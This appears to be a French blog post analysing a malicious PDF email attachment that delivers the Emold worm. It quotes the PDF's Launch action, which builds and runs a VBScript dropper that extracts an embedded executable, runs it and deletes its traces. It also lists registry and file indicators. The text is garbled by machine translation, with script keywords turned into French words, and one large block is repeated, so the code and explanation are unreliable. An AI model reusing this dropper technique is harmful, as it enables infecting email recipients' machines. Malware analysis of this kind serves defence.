Méthode d'infection par Mail avec PDF
Sebdelkil vous présente aujourd'hui la méthode d'infection par Mail avec PDF en pièce jointe....
Informations techniques (analyse)
Worm:Win32/Emold.gen!D est une détection générique pour un ver qui installe un rootkit trojan, malware téléchargements et se propage vers les disques amovibles.
Attachés à ce mail, il y a le PDF malveillant appelé "doc.pdf". Ce PDF utilise les dernières vulnérabilités adobe "Lancement PDF" Récemment rendu public, faire l '«écho» dans le fichier bat. qui contient les instructions pour télécharger et exécuter un cheval de Troie: Emold.
Il s'agit d'un "downloader" génériques, qui est utilisée comme un moyen d'installer un malware en deuxième possibilité.
Sa présence dans le système peut être démontré par la présence de la clé de Registre suivante:
"Software Microsoft Windows NT CurrentVersion Image File Execution Options explorer.exe"
et le fichier:
” C:/Program Files / Microsoft Common / svchost.exe “
Nous analysons le fichier PDF, ce qui montre "son action malveillante".
8 0 obj <<
/S / Lancement /Win <</P (/c echo Set fso = CreateObject("Scripting.FileSystemObject") script.vbs> && echo Set f = fso.OpenTextFile(“doc.pdf”, 1, True) >> Script.vbs && echo pf =
f.ReadAll >> Script.vbs && echo s = InStr(jj,”‘SS”) >> Script.vbs && echo e = InStr(jj,”‘EE”) >> Script.vbs && echo s =
Mid(jj,avec,es) >> Script.vbs && echo Set z = fso.OpenTextFile(“batscript.vbs”, 2, True) >> Script.vbs && echo s = Remplacer(avec,”%”,”")
>> Script.vbs && echo z.Write(avec) >> Script.vbs && script.vbs && batscript.vbs
Mettre cmd.exe dans un fichier, appelé "script.vbs", et puis exécutez les deux fichiers "script.vbs" et "batscript.vbs".
Ensuite:
Set fso = CreateObject(“Scripting.FileSystemObject”) Set f = fso.OpenTextFile(“doc.pdf”, 1, True) echo pf = f.ReadAll echo s =
InStr(jj,”‘SS”) echo e = InStr(jj,”‘EE”) s = Mid(jj,avec,es) Set z = fso.OpenTextFile(“batscript.vbs”, 2, True) s =
Remplacer(avec,”%”,”") z.Write(avec)
Lorsque le fichier "script.vbs" est lancé, il ouvre le fichier "doc.pdf" et recherche les balises "SS" et "EE" pour marquer le début et la fin de cette section de performance utiles du fichier pdf, appelé "batscript.vbs". Cette section du PDF se présente comme suit:
5 0 obj << /Length 46 >> flux BT /F1 34 Tf 50 500 Td (Renseignements importants sur les doc.pdf)
%»SS %Dim b %Fonction c(d) %c = chr(d) %End Function %b =Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)… …cette ligne est 248413 caractères… …c(000),c(000),c(000),c(000 ),”") %Set fso = CreateObject(“Scripting.FileSystemObject”) %Set f =
fso.OpenTextFile(“game.exe”, 2, True) %Pour i = 0 Pour 35328 %f.write(b(dans)) %Suivant %f.close() %Set WshShell = WScript.CreateObject(“WScript.Shell”) %WshShell.Run
“game.exe c cmd.exe /” %WScript.Sleep 3000 %Set f = FSO.GetFile(“game.exe”) %f.Delete %Set f = FSO.GetFile(“batscript.vbs”) %f.Delete %Set f =
FSO.GetFile(“script.vbs”) %f.Delete %'EE endstream
Set fso = CreateObject(“Scripting.FileSystemObject”) Set f = fso.OpenTextFile(“doc.pdf”, 1, True) echo pf = f.ReadAll echo s =
InStr(jj,”‘SS”) echo e = InStr(jj,”‘EE”) s = Mid(jj,avec,es) Set z = fso.OpenTextFile(“batscript.vbs”, 2, True) s =
Remplacer(avec,”%”,”") z.Write(avec)
Lorsque le fichier "script.vbs" est lancé, il ouvre le fichier "doc.pdf" et recherche les balises "SS" et "EE" pour marquer le début et la fin de cette section de performance utiles du fichier pdf, appelé "batscript.vbs". Cette section du PDF se présente comme suit:
5 0 obj << /Length 46 >> flux BT /F1 34 Tf 50 500 Td (Renseignements importants sur les doc.pdf)
%»SS %Dim b %Fonction c(d) %c = chr(d) %End Function %b =Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)… …cette ligne est 248413 caractères… …c(000),c(000),c(000),c(000 ),”") %Set fso = CreateObject(“Scripting.FileSystemObject”) %Set f =
fso.OpenTextFile(“game.exe”, 2, True) %Pour i = 0 Pour 35328 %f.write(b(dans)) %Suivant %f.close() %Set WshShell = WScript.CreateObject(“WScript.Shell”) %WshShell.Run
“game.exe c cmd.exe /” %WScript.Sleep 3000 %Set f = FSO.GetFile(“game.exe”) %f.Delete %Set f = FSO.GetFile(“batscript.vbs”) %f.Delete %Set f =
FSO.GetFile(“script.vbs”) %f.Delete %'EE endstream
Il est clair que dans ce PDF il y a un virus, va ce dire la personne un temps soit peux éclairer...
L'exécutable nommé "game.exe". Il va ce mettre a recherché le logiciels malveillants!
Mais...... Après son exécution, puis l'installation du logiciels malveillants, le script nettoie le système en supprimant le fichier: "script.vbs", "Batscript.vbs" et "game.exe".